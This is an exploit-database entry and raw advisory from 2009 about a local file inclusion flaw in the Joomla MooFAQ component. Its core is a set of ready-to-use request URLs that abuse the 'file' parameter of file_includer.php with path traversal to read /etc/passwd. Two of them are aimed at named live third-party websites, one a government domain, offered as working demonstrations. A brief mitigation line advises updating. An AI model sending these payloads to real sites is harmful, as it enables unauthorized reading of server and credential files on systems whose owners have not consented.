Joomla Component MooFAQ Local File Inclusion Vulnerability

vendor:

FAQ Component using mooTools

by:

Chip D3 Bi0s

4,3

CVSS

MEDIUM

LFI

CWE

Product Name: FAQ Component using mooTools

Affected Version From: 1.0

Affected Version To: 1.0.13

Patch Exists: YES

Related CWE: N/A

CPE: a:focalizaisso:faq_component_using_mootools

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component MooFAQ Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in the Joomla Component MooFAQ. An attacker can exploit this vulnerability to include local files on the vulnerable system. This can be done by sending a specially crafted HTTP request to the vulnerable system. The vulnerable parameter is 'file' in 'file_includer.php' script. An example of a vulnerable request is http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]. Demo Live (1): http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd Demo Live (2): http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the component.

Source

Exploit-DB raw data:

----------------------------------------------------------------------
Joomla Component MooFAQ Local File Inclusion Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Vulnerability :  LFI
 ###################################################

________________________________________________________

Example:

http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]


Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd

Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd

++++++++++++++++++++++++++++++++
[!] Produced in South America
--------------------------------


<productName>FAQ Component using mooTools</productName>
<creationDate>20 July 2007</creationDate>
<version>1.0</version>
<joomlaVersion>1.0.13</joomlaVersion>
<author>Douglas Machado</author>
<authorName>Douglas Machado</authorName>
<authorEmail>falecom@focalizaisso.com.br</authorEmail>
<authorUrl>opensource.focalizaisso.com.br</authorUrl>
<productPicture>config.png</productPicture>
<productUrl>http://opensource.focalizaisso.com.br/</productUrl>
<setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>

# milw0rm.com [2009-06-08]